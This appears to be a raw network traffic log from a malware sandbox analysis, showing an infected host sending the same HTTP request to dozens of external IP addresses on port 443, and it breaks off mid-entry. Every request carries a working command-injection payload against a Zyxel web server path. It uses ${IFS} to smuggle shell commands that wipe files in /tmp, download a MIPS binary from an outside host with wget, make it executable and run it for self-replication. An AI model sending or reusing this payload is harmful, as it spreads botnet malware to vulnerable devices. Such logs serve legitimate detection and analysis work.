                                                      Feb 2, 2024 06:35:58.756048918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5908192.168.2.1435636110.153.237.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756083012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5909192.168.2.1457048172.56.26.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756143093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5910192.168.2.1447260223.117.155.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756164074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5911192.168.2.1447254213.133.63.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756215096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5912192.168.2.1444464170.161.117.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756244898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5913192.168.2.144525035.2.1.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756280899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5914192.168.2.1456880117.12.30.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756335974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5915192.168.2.1447220209.0.189.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756381035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5916192.168.2.1439110207.59.235.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756419897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5917192.168.2.145061661.228.14.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756469011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5918192.168.2.1458804117.123.179.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756496906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5919192.168.2.1446134151.78.33.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756541967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5920192.168.2.144128060.8.175.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756577969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5921192.168.2.145543078.233.231.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756620884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5922192.168.2.1456472179.134.226.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756668091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5923192.168.2.1447346110.33.111.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756731033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5924192.168.2.144318279.65.222.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756758928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5925192.168.2.1447400138.81.208.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756810904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5926192.168.2.1439246131.56.212.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756846905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5927192.168.2.1458734155.23.42.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756896019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5928192.168.2.144483844.186.251.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756927013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5929192.168.2.146072481.162.201.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756973982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5930192.168.2.1435488181.188.137.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.757016897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5931192.168.2.1439878105.229.71.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.757050037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5932192.168.2.1451238114.227.146.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.757116079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5933192.168.2.1456192164.156.130.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.757134914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5934192.168.2.1434326188.159.21.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.757183075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5935192.168.2.1433878205.209.127.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.757221937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5936192.168.2.144083858.171.211.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.757250071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5937192.168.2.143983632.67.180.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.757298946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5938192.168.2.144665867.184.30.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.761024952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5939192.168.2.1442122216.114.105.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.761080027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5940192.168.2.143500468.239.91.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.761137009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5941192.168.2.144938432.203.11.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.761199951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5942192.168.2.1448350165.169.51.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.761215925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5943192.168.2.1443546171.157.58.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.761271000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5944192.168.2.144503879.222.40.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.761332035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5945192.168.2.1435660167.110.114.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769329071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5946192.168.2.143428037.85.136.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769361019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5947192.168.2.1437682119.73.199.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769387960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5948192.168.2.1434408115.145.192.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769454002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5949192.168.2.1449376219.235.176.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769467115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5950192.168.2.1439500152.160.201.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769515038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5951192.168.2.143958897.141.175.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769565105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5952192.168.2.143365463.92.237.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769613028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5953192.168.2.14417645.180.232.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769654989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5954192.168.2.145911697.243.0.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769680023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5955192.168.2.1449814153.163.2.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769743919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5956192.168.2.14448784.153.156.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769779921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5957192.168.2.143457825.92.186.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769823074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5958192.168.2.1436654102.130.100.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769850016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5959192.168.2.1459524196.49.103.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769906044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5960192.168.2.1455324173.40.169.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769959927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5961192.168.2.1436440204.8.208.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.769999981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5962192.168.2.1450176166.224.51.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770030022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5963192.168.2.1456788118.97.105.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770073891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5964192.168.2.1446092149.23.5.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770123959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5965192.168.2.1447030188.0.7.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770149946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5966192.168.2.1455792209.67.126.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770186901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5967192.168.2.146093653.102.227.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770221949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5968192.168.2.144907687.172.246.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770256996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5969192.168.2.145771278.246.211.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770306110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5970192.168.2.1447602151.230.61.163443
                                                      TimestampBytes transferredDirectionData
